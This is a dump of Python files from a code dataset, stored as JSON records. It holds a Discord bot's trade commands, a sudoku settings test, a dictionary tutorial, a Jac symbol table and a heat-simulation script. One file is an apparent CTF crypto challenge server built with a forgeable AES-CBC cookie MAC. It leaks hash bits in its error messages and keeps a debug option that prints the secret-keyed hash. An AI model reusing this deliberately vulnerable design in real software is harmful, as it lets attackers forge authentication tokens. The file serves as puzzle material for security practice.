\"\n \"\\N{SMILING FACE WITH SMILING EYES} We will be looking forward to working with \"\n f\"you again! You sold **{item.full_name} x{self.amount}** for **{total_reward} \"\n f\"{self.client.gold_emoji}**\"\n ),\n footer=f\"You now have {self.user_data.gold} gold coins!\",\n cmd=self\n )\n await self.edit(embed=embed, view=None)\n\n\nclass TradesCommand(FarmSlashCommand, name=\"trades\"):\n _required_level: int = 5\n\n\nclass TradesListCommand(\n TradesCommand,\n name=\"list\",\n description=\"\\N{PAGE WITH CURL} Lists all active trades in this server\",\n parent=TradesCommand\n):\n \"\"\"\n Trades are a way to sell and buy items between players. Trade offers are created per\n server. You can post a limited amount of trade offers per server, but you can buy\n more trading slots with gold from the **/shop**.
        \n \\N{ELECTRIC LIGHT BULB} To create a trade offer, use the **/trades create** command.\n \"\"\"\n owned: Optional[bool] = discord.app.Option(\n description=\"Set to true, to only list your created trades\",\n default=False\n )\n\n async def callback(self):\n async with self.acquire() as conn:\n if not self.owned:\n query = \"SELECT * FROM store WHERE guild_id = $1;\"\n trades_data = await conn.fetch(query, self.guild.id)\n else:\n query = \"SELECT * FROM store WHERE guild_id = $1 AND user_id = $2;\"\n trades_data = await conn.fetch(query, self.guild.id, self.author.id)\n\n await views.ButtonPaginatorView(\n self,\n source=TradesSource(\n entries=trades_data,\n server_name=self.guild.name,\n own_trades=self.owned\n )\n ).start()\n\n\nclass TradesCreateCommand(\n TradesCommand,\n name=\"create\",\n description=\"\\N{SQUARED NEW} Creates a new trade offer\",\n parent=TradesCommand\n):\n \"\"\"\n This command posts a new trade offer in the Discord server you are currently in.\n When creating a trade offer, you have to specify the item you want to sell, the amount\n of items you want to sell, and the price you want to sell them for.\n When trade offer is created, the corresponding items are removed from your inventory.
        \n \\N{ELECTRIC LIGHT BULB} To view already posted trade offers in this server, use the\n **/trades list** command.\n \"\"\"\n item: str = discord.app.Option(description=\"Item to trade\", autocomplete=True)\n amount: int = discord.app.Option(description=\"How many items to trade\", min=1, max=2000)\n price: Literal[\"cheap\", \"average\", \"expensive\", \"very expensive\"] = \\\n discord.app.Option(description=\"Price for the items you want to sell\")\n\n async def autocomplete(self, options, focused):\n return discord.AutoCompleteResponse(self.all_items_autocomplete(options[focused]))\n\n async def callback(self):\n item = self.lookup_item(self.item)\n\n if not isinstance(item, game_items.MarketItem):\n embed = embed_util.error_embed(\n title=\"This item can't be traded!\",\n text=f\"Sorry, you can't trade **{item.full_name}** here!\",\n cmd=self\n )\n return await self.reply(embed=embed)\n\n conn = await self.acquire()\n item_data = await self.user_data.get_item(item.id, conn)\n if not item_data or item_data['amount'] < self.amount:\n await self.release()\n return await self.reply(embed=embed_util.not_enough_items(self, item, self.amount))\n\n base_min, base_max = item.min_market_price, item.max_market_price\n prices_map = {\n \"cheap\": lambda: base_min * self.amount,\n \"average\": lambda: int(((base_min + base_max) / 2) * self.amount),\n \"expensive\": lambda: base_max * self.amount,\n \"very expensive\": lambda: int((base_max * self.amount) * 1.25)\n }\n total_price = prices_map[self.price]()\n\n query = \"SELECT COUNT(*) FROM store WHERE user_id = $1 AND guild_id = $2;\"\n used_slots = await conn.fetchval(query, self.author.id, self.guild.id)\n if used_slots >= self.user_data.store_slots:\n await self.release()\n embed = embed_util.error_embed(\n title=\"You have reached maximum active trade offers in this server!\",\n text=(\n \"Oh no! We can't create this trade offer, because you already have used \"\n f\"**{used_slots} of your {self.user_data.store_slots}** available trading \"\n \"deals! \\N{BAR CHART}\\n\\n\"\n \"\\N{ELECTRIC LIGHT BULB} What you can do about this:\\na) Wait for someone \"\n \"to accept any of your current trades.\\nb) Delete some trades.\\n\"\n \"c) Upgrade your max. deal capacity with the \"\n \"**/shop upgrades buy \\\"trade deals\\\"** command.\"\n ),\n cmd=self\n )\n return await self.reply(embed=embed)\n\n async with conn.transaction():\n await self.user_data.remove_item(item.id, self.amount, conn)\n # We store username, to avoid fetching the user from Discord's\n # API just to get the username every time someone wants to view\n # the trades. (we don't store members data in bot's cache)\n query = \"\"\"\n INSERT INTO store\n (guild_id, user_id, username, item_id, amount, price)\n VALUES ($1, $2, $3, $4, $5, $6)\n RETURNING id;\n \"\"\"\n trade_id = await conn.fetchval(\n query,\n self.guild.id,\n self.author.id,\n self.author.name,\n item.id,\n self.amount,\n total_price\n )\n await self.release()\n\n embed = embed_util.success_embed(\n title=\"Trade offer is successfully created!\",\n text=(\n \"All set! The trade offer is up! \\N{THUMBS UP SIGN}\\n\"\n f\"You have put **{self.amount}x {item.full_name}** for sale at a price of \"\n f\"**{total_price}** {self.client.gold_emoji} for this server members!\\n\\n\"\n \"\\N{BUSTS IN SILHOUETTE} If you know the person you are selling your items to, \"\n f\"they can use this command to buy your items: **/trades accept {trade_id}**\\n\"\n \"\\N{WASTEBASKET} If you want to cancel this trade offer use: \"\n f\"**/trades delete {trade_id}**\"\n ),\n cmd=self\n )\n await self.reply(embed=embed)\n\n\nclass TradesAcceptCommand(\n TradesCommand,\n name=\"accept\",\n description=\"\\N{HANDSHAKE} Accepts someone else's trade offer\",\n parent=TradesCommand\n):\n \"\"\"\n This command accepts a trade offer and purchases the listed items from the other player.\n You can only purchase items that are listed in the current Discord server you are in.
        \n \\N{ELECTRIC LIGHT BULB} To create a trade offer in this server, use the\n **/trades create** command.
        \n You can't accept your own trades, but you can delete them with the **/trades delete** command.\n \"\"\"\n id: int = discord.app.Option(\n description=\"Trade ID of the trade to accept\",\n min=1,\n max=2147483647 # PostgreSQL's max int value\n )\n\n async def reject_for_not_found(self):\n embed = embed_util.error_embed(\n title=\"Trade not found!\",\n text=(\n f\"I could not find a trade with **ID: {self.id}**! \\N{CONFUSED FACE}\\n\"\n \"This trade might already be accepted by someone else or deleted by the \"\n \"trader itself. View all the available trades with the **/trades list** \"\n \"command. \\N{CLIPBOARD}\"\n ),\n cmd=self\n )\n if not self.interaction.response.is_done():\n await self.reply(embed=embed)\n else:\n await self.edit(embed=embed, view=None)\n\n async def callback(self):\n async with self.acquire() as conn:\n query = \"SELECT * FROM store WHERE id = $1 AND guild_id = $2;\"\n trade_data = await conn.fetchrow(query, self.id, self.guild.id)\n\n if not trade_data:\n return await self.reject_for_not_found()\n\n if trade_data['user_id'] == self.author.id:\n embed = embed_util.error_embed(\n title=\"You can't trade with yourself!\",\n text=(\n \"\\N{WASTEBASKET} If you want to cancel this trade, use: \"\n f\"**/trades delete {self.id}**\"\n ),\n cmd=self\n )\n return await self.reply(embed=embed)\n\n item = self.items.find_item_by_id(trade_data['item_id'])\n amount, price = trade_data['amount'], trade_data['price']\n\n if item.level > self.user_data.level:\n embed = embed_util.error_embed(\n title=\"\\N{LOCK} Insufficient experience level!\",\n text=(\n f\"Sorry, you can't buy **{item.full_name}** just yet! \"\n \"What are you planning to do with an item, that you can't even use yet? \"\n \"I'm just curious... \\N{THINKING FACE}\"\n ),\n footer=f\"This item is going to be unlocked at experience level {item.level}.\",\n cmd=self\n )\n return await self.reply(embed=embed)\n\n try:\n seller_member = await self.guild.fetch_member(trade_data['user_id'])\n except discord.HTTPException as e:\n if e.status != 404:\n raise e\n\n async with self.acquire() as conn:\n query = \"DELETE FROM store WHERE id = $1;\"\n await conn.execute(query, self.id)\n\n embed = embed_util.error_embed(\n title=\"Oops, the trader has vanished!\",\n text=(\n \"Looks like this trader has left this cool server, so their trade isn't \"\n \"available anymore. Sorry! \\N{CRYING FACE}\"\n ),\n footer=\"Let's hope that they will join back later\",\n cmd=self\n )\n return await self.reply(embed=embed)\n\n embed = embed_util.prompt_embed(\n title=\"Do you accept this trade offer?\",\n text=\"Are you sure that you want to buy these items from this user?\",\n cmd=self\n )\n embed.add_field(\n name=\"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{EAR OF RICE} Seller\",\n value=seller_member.mention\n )\n embed.add_field(name=\"\\N{LABEL} Item\", value=f\"{amount}x {item.full_name}\")\n embed.add_field(name=\"\\N{MONEY BAG} Total price\", value=f\"{price} {self.client.gold_emoji}\")\n\n confirm = await views.ConfirmPromptView(\n self,\n initial_embed=embed,\n emoji=self.client.gold_emoji,\n label=\"Accept trade offer\",\n deny_label=\"Deny trade offer\"\n ).prompt()\n\n if not confirm:\n return\n\n conn = await self.acquire()\n # Trade might already be deleted by now\n query = \"SELECT * FROM store WHERE id = $1;\"\n trade_data = await conn.fetchrow(query, self.id)\n\n if not trade_data:\n await self.release()\n return await self.reject_for_not_found()\n\n user_data = await self.users.get_user(self.author.id, conn=conn)\n trade_user_data = await self.users.get_user(trade_data['user_id'], conn=conn)\n\n if user_data.gold < price:\n await self.release()\n return await self.edit(embed=embed_util.no_money_embed(self, price), view=None)\n\n async with conn.transaction():\n query = \"DELETE FROM store WHERE id = $1;\"\n await conn.execute(query, self.id)\n await user_data.give_item(item.id, amount, conn)\n user_data.gold -= price\n trade_user_data.gold += price\n await self.users.update_user(user_data, conn=conn)\n await self.users.update_user(trade_user_data, conn=conn)\n await self.release()\n\n embed = embed_util.success_embed(\n title=\"Successfully bought items!\",\n text=(\n f\"You bought **{amount}x {item.full_name}** from {seller_member.mention} for \"\n f\"**{price}** {self.client.gold_emoji}\\n\"\n \"What a great trade you both just made! \\N{HANDSHAKE}\"\n ),\n cmd=self\n )\n await self.edit(embed=embed, view=None)\n\n if not trade_user_data.notifications.is_enabled(UserNotifications.TRADE_ACCEPTED):\n return\n\n embed = embed_util.success_embed(\n title=\"Congratulations! You just made a sale!\",\n text=(\n f\"Hey boss! I only came to say that {self.author.mention} just accepted your trade \"\n f\"offer and bought your **{amount}x {item.full_name}** for **{price}** \"\n f\"{self.client.gold_emoji}\"\n ),\n cmd=self,\n private=True\n )\n # User might have direct messages disabled\n with suppress(discord.HTTPException):\n await seller_member.send(embed=embed)\n\n\nclass TradesDeleteCommand(\n TradesCommand,\n name=\"delete\",\n description=\"\\N{WASTEBASKET} Cancels your trade offer\",\n parent=TradesCommand\n):\n \"\"\"\n This command is used to cancel a trade offer. You can only cancel your own trade offers.\n Canceling a trade offer will return the items to your inventory.\n \"\"\"\n id: int = discord.app.Option(\n description=\"Trade ID of the trade to delete\",\n min=1,\n max=2147483647 # PostgreSQL's max int value\n )\n\n async def callback(self):\n conn = await self.acquire()\n # It is fine if they delete their own trades from other guilds\n query = \"SELECT * FROM store WHERE id = $1 AND user_id = $2;\"\n trade_data = await conn.fetchrow(query, self.id, self.author.id)\n\n if not trade_data:\n await self.release()\n embed = embed_util.error_embed(\n title=\"Trade offer not found!\",\n text=(\n f\"Hmm... I could not find your trade **ID: {self.id}**! You might have \"\n \"provided wrong ID or this trade that does not exist anymore. \\N{THINKING FACE}\"\n \"\\nCheck your created trades in this server with the **/trades list** command.\"\n ),\n cmd=self\n )\n return await self.reply(embed=embed)\n\n async with conn.transaction():\n query = \"DELETE FROM store WHERE id = $1;\"\n await conn.execute(query, self.id)\n item_id, amount = trade_data['item_id'], trade_data['amount']\n await self.user_data.give_item(item_id, amount, conn)\n await self.release()\n\n item = self.items.find_item_by_id(trade_data['item_id'])\n embed = embed_util.success_embed(\n title=\"Trade offer canceled!\",\n text=(\n f\"\\N{WASTEBASKET} Okay, I removed your trade offer: **{trade_data['amount']}x \"\n f\"{item.full_name} for {trade_data['price']} {self.client.gold_emoji}**\"\n ),\n footer=\"These items are now moved back to your /inventory\",\n cmd=self\n )\n await self.reply(embed=embed)\n\n\ndef setup(client) -> list:\n return [ShopCollection(client)]\n","repo_name":"fuzzysearch404/discord-farm","sub_path":"bot/commands/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":43145,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"72265089816","text":"'''\nCreated on Jul 5, 2013\n\n@author: Jimena Terceros\n'''\nimport unittest\nimport os\n\nfrom sudoku.settings.exceptions.InvalidXMLSettingsException import InvalidXMLSettingsException\nfrom sudoku.settings.exceptions.FileNotFoundException import FileNotFoundException\nfrom sudoku.settings.SettingsReader import SettingsReader\nfrom sudoku.settings.Level import Level\n\nclass TestSettingsReader(unittest.TestCase):\n\n def setUp(self):\n self.notExistFileName = \"settings2.xml\"\n\n self.createValidXMLConfigFile()\n self.createInvalidXMLConfigFile()\n self.createCorruptedXMlConfigFile()\n \n def tearDown(self):\n os.remove(self.fileName)\n os.remove(self.invaliFileName)\n os.remove(self.corruptedFileName)\n \n def createCorruptedXMlConfigFile(self):\n self.corruptedFileName = \"corruptedSettings.xml\"\n \n file = open(self.corruptedFileName, \"w\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.close()\n \n def createInvalidXMLConfigFile(self):\n self.invaliFileName = \"invalidSettings.xml\"\n \n file = open(self.invaliFileName, \"w\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.close()\n \n def createValidXMLConfigFile(self):\n self.fileName = \"settings.xml\"\n self.outputType = \"file\"\n self.algorithmName = \"Peter Norving\"\n self.defaultLevel = \"Level 2\"\n self.levels = [Level(\"Level 1\", 5, 10), Level(\"Level 2\", 11, 20), Level(\"Level 3\", 21, 30)]\n self.path = \"c:\\\\test\"\n \n file = open(self.fileName, \"w\")\n file.write(\"\\n\")\n file.write(\"file\\n\")\n file.write(\"c:\\\\test\\n\")\n file.write(\"Peter Norving\\n\")\n file.write(\"Level 2\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.close()\n\n def test_Given_a_valid_xml_file_then_read_output_type_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n outputType = settings.getOutputType()\n expectedOutputType = self.outputType\n self.assertEqual(expectedOutputType, outputType)\n \n def test_Given_a_valid_xml_file_then_read_path_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n path = settings.getPath()\n expectedPath = self.path\n self.assertEqual(expectedPath, path)\n \n def test_Given_a_valid_xml_file_then_read_default_algorithm_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n algorithmName = settings.getAlgorithmName()\n expectedAlgorithmName = self.algorithmName\n self.assertEqual(expectedAlgorithmName, algorithmName)\n \n def test_Given_a_valid_xml_file_then_read_default_level_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n defaultLevel = settings.getDefaultLevel()\n expectedDefaultLevel = self.defaultLevel\n self.assertEqual(expectedDefaultLevel, defaultLevel) \n \n def test_Given_a_valid_xml_file_then_read_dificult_levels_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n levels = settings.getLevels()\n expectedlevels = self.levels\n self.assertListEqual(expectedlevels, levels)\n \n def test_Given_an_xmlconfig_without_OutputType_Value_then_the_default_value_should_be_used(self):\n reader = SettingsReader()\n settings = reader.read(self.invaliFileName)\n outputType = settings.getOutputType()\n expectedOutputType = settings.DEFAULT_OUTPUT_TYPE\n self.assertEqual(expectedOutputType, outputType)\n \n def test_Given_an_xmlconfig_without_AlgorithmName_Value_then_the_default_value_should_be_used(self):\n reader = SettingsReader()\n settings = reader.read(self.invaliFileName)\n algorithmName = settings.getAlgorithmName()\n expectedalgorithmName = settings.DEFAULT_ALGORITHM_NAME\n self.assertEqual(expectedalgorithmName, algorithmName)\n \n def test_Given_an_xmlconfig_without_DefaultLevel_Value_then_the_default_value_should_be_used(self):\n reader = SettingsReader()\n settings = reader.read(self.invaliFileName)\n defaultLevel = settings.getDefaultLevel()\n expectedDefaultLevel = settings.DEFAULT_LEVEL_NAME\n self.assertEqual(expectedDefaultLevel, defaultLevel)\n \n def test_Given_an_xmlconfig_without_levels_then_a_default_level_should_be_created(self):\n reader = SettingsReader()\n settings = reader.read(self.invaliFileName)\n levels = settings.getLevels()\n \n expectedSize = 1\n expectedLevelName = Level(settings.DEFAULT_LEVEL_NAME, settings.DEFAULT_MIN, settings.DEFAULT_MAX)\n self.assertEqual(expectedSize, len(levels))\n self.assertEqual(expectedLevelName, levels[0])\n\n def test_Given_a_bad_xml_file_then_verify_that_raise_an_exception(self):\n try:\n reader = SettingsReader()\n reader.read(self.corruptedFileName)\n self.fail(\"Didn't raise an expected exception.\")\n except InvalidXMLSettingsException:\n pass\n \n def test_if_the_xml_config_file_is_not_found_then_should_be_created_one_with_default_values(self):\n try:\n reader = SettingsReader()\n reader.read(\"Mytest.xml\")\n self.fail(\"Didn't raise an expected exception.\")\n except FileNotFoundException:\n pass\n \n def test_If_there_is_not_settings_file_the_should_create_default_settings_file(self):\n pass\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"pysudoku/sudoku","sub_path":"src/unitTests/settings/TestSettingsReader.py","file_name":"TestSettingsReader.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"9774200223","text":"# A dictionary is a collection of unordered, modifiable and paired (key: value) data type.\n# a dict can hold values as: lists, tuples and sets\nempty_dic = {}\ndct = {'key':'value', 'test':'testing', 'hey':'hello', 'booking':'book'}\nfull_dict = {\n 'list':['Alist', 'hey', 'test'],\n 'set':{'aSet', 'banana', 2},\n 'tuple':('AtuPle', 'eskimo', 4)\n}\nprint(len(dct)) # prints the amount of items in dict\nprint(full_dict)\n\n# We can also create a dict inside a dict and organize it in such way:\nperson = {\n 'first_name':'Nat',\n 'last_name':'Ir',\n 'age':25,\n 'profession':'Dev',\n 'is_merried':'No',\n 'address': {\n 'street':'XYZ',\n 'ZIP':'1234'\n }\n}\nprint(person)\nprint(person['address']) # print value for spec key\nprint(person.get('age')) # this will be the correct way to utilize the above, if the address key is missing it'll result an error\n\n# add key and value and add new value to existing key\nperson['pets'] = 'dog' # will add it to the bottom of the dict\nperson['skills'] = ['Linux', 'Aws', 'script']\nperson['skills'].append('python')\nprint(person)\n\n# to change a value in one of the keys\nperson['first_name'] = 'Nate'\n\n# checking for a key in Dict using in opertaor\nprint('address' in person)\n\n# removing key and value \nperson.pop('last_name') # will pop the mentioned key\nlast = person.popitem() # will pop the last key and value\ndel person['is_merried'] # this will delete the key and value\nprint(person)\nprint(last) # printing the poped item\n\n# copy dict\nperson_copy = person.copy()\n\n# clear a dict, will leave an empty directory\nperson.clear()\nprint(person)\n\n# delete a dir, the copied dict will remain\ndel person\nprint(person_copy)\n\n# creating a list of values\nval = person_copy.values()\nprint(val)","repo_name":"SirNatan1/python_training","sub_path":"Day8/Dictionaries.py","file_name":"Dictionaries.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25503437167","text":"from Crypto.Cipher import AES\nfrom Crypto import Random\nfrom hashlib import sha256\nfrom signal import alarm\nbs = 16\n\n\ndef pad(s):\n return s + (bs - len(s) % bs) * bytes((bs - len(s) % bs, ))\n\n\ndef unpad(s):\n return s[0:-s[-1]]\n\n\nclass cipher(object):\n def __init__(self, key):\n self.key = key\n\n def cbcPrimeEnc(self, key, iv, plain):\n cipher = AES.new(key, AES.MODE_CBC, iv)\n plain = pad(plain)\n# print(len(plain))\n# print(len(cipher.encrypt(plain)))\n return cipher.encrypt(plain)\n\n def cbcPrimeDec(self, key, iv, ciphertext):\n cipher = AES.new(key, AES.MODE_CBC, iv)\n plain = cipher.decrypt(ciphertext)\n return unpad(plain)\n\n def encrypt(self, plaintext):\n hash = sha256(mac_key + plaintext).digest()\n iv = Random.new().read(bs)\n# print( iv)\n ciphertext = iv + \\\n self.cbcPrimeEnc(authen_key, iv, hash) + \\\n self.cbcPrimeEnc(self.key, iv, plaintext)\n return ciphertext.hex()\n\n def decrypt(self, ciphertext):\n cookie = bytes.fromhex(ciphertext)\n iv = cookie[:bs]\n mac = cookie[bs:4 * bs]\n ciphertext = cookie[4 * bs:]\n plaintext = self.cbcPrimeDec(self.key, iv, ciphertext)\n print(plaintext)\n hash = self.cbcPrimeDec(authen_key, iv, mac)\n print(hash.hex()[-63:])\n print(sha256(mac_key + plaintext).digest().hex()[-63:])\n if sha256(mac_key + plaintext).digest().hex()[-63:] == hash.hex()[-63:]:\n return str(plaintext, 'ISO-8859-1')\n else:\n # return high 136 bits hex string\n raise Exception(\n sha256(mac_key + plaintext).digest().hex()[-64:-30], hash.hex()[-64:-30])\n\n\nencrypt_key = Random.new().read(bs)\nmac_key = Random.new().read(2 * bs)\nauthen_key = Random.new().read(bs)\nwith open('flag', 'r') as fp:\n flag = fp.readline()\nalarm(20)\nwhile True:\n c = cipher(encrypt_key)\n print('welcome to Fantasy Terram')\n choice = input(\"Please [r]egister or [l]ogin :>>\")\n if not choice:\n break\n if choice[0] == 'r':\n name = input('your name is:>>')\n name = bytes(name, 'ISO-8859-1') + b'user'\n if(len(name) > 1024):\n print(\"username too long!\")\n break\n else:\n print(\"Here is your cookie:\")\n print(c.encrypt(name))\n elif choice[0] == 'l':\n data = input('your cookie:>>')\n try:\n msg = c.decrypt(data)\n if msg[-4:] == 'user':\n print(\"Welcome %s!\" % msg[:-4])\n elif msg[-5:] == 'admin':\n print(flag)\n except Exception as e:\n print('Wrong MAC! ')\n print(\n 'the actual first 136 bits of sha256 and the suppposed first 136 bits is:>>' + str(e))\n else:\n exit()\n\n # must be delete!\n elif choice[0] == 'c':\n un = input('your username:>>')\n un = bytes(un, 'ISO-8859-1')\n print(sha256(mac_key + un).digest().hex())\n\n else:\n print(\"Unknown choice!\")\n break\n","repo_name":"st424204/ctf_practice","sub_path":"hitbxctf2018/crypt/cbc.py","file_name":"cbc.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"68"} +{"seq_id":"33476301324","text":"from django.core.mail import send_mail\nfrom django.conf import settings\n\n\ndef send_order_emails(model, version, mail_list):\n \"\"\"\n Функция отправляет электронные письма клиентам, которые находятся\n в листе ожидания.\n\n :param model: Название модели товара.\n :type model: str\n :param version: Версия товара.\n :type version: str\n :param mail_list: Список адресов электронной почты, на которые будет отправлено уведомление.\n :type mail_list: list\n :return: None\n \"\"\"\n message_text = f'Добрый день!\\n' \\\n f'Недавно вы интересовались ' \\\n f'нашим роботом модели {model}, версии {version}.\\n' \\\n 'Этот робот теперь в наличии. Если вам подходит' \\\n ' этот вариант - пожалуйста, свяжитесь с нами'\n\n send_mail(\n subject='Робот в наличии',\n message=message_text,\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=mail_list,\n fail_silently=False\n )\n","repo_name":"mxstrv/r4c","sub_path":"orders/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"69924056218","text":"\"\"\"Jac Symbol Table.\"\"\"\nfrom __future__ import annotations\n\nfrom enum import Enum\nfrom typing import Optional, TYPE_CHECKING\n\n\nif TYPE_CHECKING:\n import jaclang.jac.absyntree as ast\n\n\nclass SymbolType(Enum):\n \"\"\"Symbol types.\"\"\"\n\n MODULE = \"module\"\n MOD_VAR = \"mod_var\"\n VAR = \"var\"\n IMM_VAR = \"immutable\"\n ABILITY = \"ability\"\n OBJECT_ARCH = \"object\"\n NODE_ARCH = \"node\"\n EDGE_ARCH = \"edge\"\n WALKER_ARCH = \"walker\"\n ENUM_ARCH = \"enum\"\n TEST = \"test\"\n TYPE = \"type\"\n IMPL = \"impl\"\n HAS_VAR = \"field\"\n METHOD = \"method\"\n CONSTRUCTOR = \"constructor\"\n ENUM_MEMBER = \"enum_member\"\n\n def __str__(self) -> str:\n \"\"\"Stringify.\"\"\"\n return self.value\n\n\nclass SymbolAccess(Enum):\n \"\"\"Symbol types.\"\"\"\n\n PRIVATE = \"private\"\n PUBLIC = \"public\"\n PROTECTED = \"protected\"\n\n def __str__(self) -> str:\n \"\"\"Stringify.\"\"\"\n return self.value\n\n\nclass Symbol:\n \"\"\"Symbol.\"\"\"\n\n def __init__(\n self,\n defn: ast.AstSymbolNode,\n access: SymbolAccess,\n typ: Optional[type] = None,\n ) -> None:\n \"\"\"Initialize.\"\"\"\n self.typ = typ\n self.defn: list[ast.AstSymbolNode] = [defn]\n defn.sym_link = self\n self.access = access\n\n @property\n def decl(self) -> ast.AstSymbolNode:\n \"\"\"Get decl.\"\"\"\n return self.defn[0]\n\n @property\n def sym_name(self) -> str:\n \"\"\"Get name.\"\"\"\n return self.decl.sym_name\n\n @property\n def sym_type(self) -> SymbolType:\n \"\"\"Get sym_type.\"\"\"\n return self.decl.sym_type\n\n def add_defn(self, node: ast.AstSymbolNode) -> None:\n \"\"\"Add defn.\"\"\"\n self.defn.append(node)\n node.sym_link = self\n\n def __repr__(self) -> str:\n \"\"\"Repr.\"\"\"\n return (\n f\"Symbol({self.sym_name}, {self.sym_type}, {self.access}, \"\n f\"{self.typ}, {self.defn})\"\n )\n\n\nclass SymbolTable:\n \"\"\"Symbol Table.\"\"\"\n\n def __init__(\n self, name: str, owner: ast.AstNode, parent: Optional[SymbolTable] = None\n ) -> None:\n \"\"\"Initialize.\"\"\"\n self.name = name\n self.owner = owner\n self.parent = parent if parent else self\n self.kid: list[SymbolTable] = []\n self.tab: dict[str, Symbol] = {}\n self.uses: list[ast.AstSymbolNode] = []\n\n def has_parent(self) -> bool:\n \"\"\"Check if has parent.\"\"\"\n return self.parent != self\n\n def get_parent(self) -> SymbolTable:\n \"\"\"Get parent.\"\"\"\n if self.parent == self:\n raise Exception(\"No parent\")\n return self.parent\n\n def lookup(self, name: str, deep: bool = True) -> Optional[Symbol]:\n \"\"\"Lookup a variable in the symbol table.\"\"\"\n if name in self.tab:\n return self.tab[name]\n if deep and self.has_parent():\n return self.get_parent().lookup(name, deep)\n return None\n\n def insert(\n self,\n node: ast.AstSymbolNode,\n access_spec: Optional[ast.AstAccessNode] = None,\n single: bool = False,\n ) -> Optional[ast.AstNode]:\n \"\"\"Set a variable in the symbol table.\n\n Returns original symbol as collision if single check fails, none otherwise.\n Also updates node.sym to create pointer to symbol.\n \"\"\"\n if single and node.sym_name in self.tab:\n return self.tab[node.sym_name].defn[-1]\n if node.sym_name not in self.tab:\n self.tab[node.sym_name] = Symbol(\n defn=node,\n access=access_spec.access_type if access_spec else SymbolAccess.PUBLIC,\n )\n\n def push_scope(self, name: str, key_node: ast.AstNode) -> SymbolTable:\n \"\"\"Push a new scope onto the symbol table.\"\"\"\n self.kid.append(SymbolTable(name, key_node, self))\n return self.kid[-1]\n\n def __repr__(self) -> str:\n \"\"\"Repr.\"\"\"\n out = f\"{self.name} {super().__repr__()}:\\n\"\n for k, v in self.tab.items():\n out += f\" {k}: {v}\\n\"\n return out\n\n\n__all__ = [\n \"Symbol\",\n \"SymbolTable\",\n \"SymbolType\",\n \"SymbolAccess\",\n]\n","repo_name":"Jaseci-Labs/jaclang","sub_path":"jaclang/jac/symtable.py","file_name":"symtable.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"21325668164","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport time\r\nimport pygmo as pg\r\nimport string\r\nimport re\r\nfrom heat import fun\r\nfrom tqdm import tqdm\r\n#from heat.fun import heatIn, qprl, qp, ql, qprp, moveFun1, neighFun, heatInAll, heatPoint, heat, yout\r\nimport copy\r\n\r\n# \r\nl = 0.1\r\nh = 1.5\r\nqh = 0\r\nqd = 0\r\nro = 760\r\nrhov = 1.1614\r\nlambd = 0.2\r\nT0p = 20\r\nT_set = 35\r\nNx = 5\r\nNy = 5\r\nstart_hour = 10\r\nend_hour = 16\r\nt_start = 3600 * start_hour\r\nt_end = 3600 * end_hour\r\ntmax = t_end - t_start\r\nqloss = 0\r\ne = 0.03\r\ncp = 1007\r\nmi = 184.6 * 10 ** (-7)\r\nk = 0.0272\r\ncv = 1007\r\nkinv = 15.52 * 10 ** (-6)\r\nm_dot = 0.03\r\nqd = 0\r\nqh = 0\r\ndx = l / (Nx - 1)\r\ndy = h / (Ny - 1)\r\ndd = 0.9\r\ndt = 0.1\r\nv = dy / dt\r\n# \r\n\r\n# \r\ndef Q_conv(n, alpha, dy, Tvz, T, p):\r\n\r\n Q_conv_out = alpha * dy * (Tvz[n, p] - T[0, n, p])\r\n\r\n return Q_conv_out\r\n\r\nrad = pd.read_csv('data/17_07_2019_Rad.txt', delimiter=';')\r\n\r\n\r\n\r\nrad_val = rad.values[:, 2].tolist()\r\n\r\ndef Q_rad(dy, dd, rad_val, p, dt):\r\n time1 = t_start + p * dt\r\n n_data = np.floor(time1/60)\r\n Q_rad_out = (rad_val[int(n_data)] + (rad_val[int(n_data+1)] - rad_val[int(n_data)])*(time1/60 - n_data)) * dy * dd\r\n\r\n Q_rad_out = 600\r\n return Q_rad_out\r\n\r\nTamb = pd.read_csv('data/17_07_2019_Tamb.txt', delimiter=';')\r\n\r\nTamb_val = Tamb.values[:, 2].tolist()\r\nTamb_val_clean = []\r\nfor i in range(len(Tamb_val)):\r\n Tamb_val_clean.append(re.sub('\\+', '', Tamb_val[i]))\r\n Tamb_val_clean[i] = Tamb_val_clean[i].replace(',', '.')\r\n Tamb_val_clean[i] = float(Tamb_val_clean[i])\r\n\r\n# plt.figure(figsize=(12, 6))\r\n# plt.subplot(121)\r\n# plt.plot(rad.values[:, 2].tolist(), 'r')\r\n# plt.xlabel('Time [min]')\r\n# plt.ylabel('Solar irradiance [W/m^2]')\r\n# plt.subplot(122)\r\n# plt.plot(Tamb_val_clean)\r\n# plt.xlabel('Time [min]')\r\n# plt.ylabel('Ambient temperature [°C]')\r\n# plt.show()\r\n# plt.savefig(\"Images/input.png\", format='png', dpi=300)\r\n\r\ndef T_ambient(Tamb_val_clean, p, dt):\r\n time1 = t_start + p * dt\r\n n_data = np.floor(time1/60)\r\n T_amb_out = 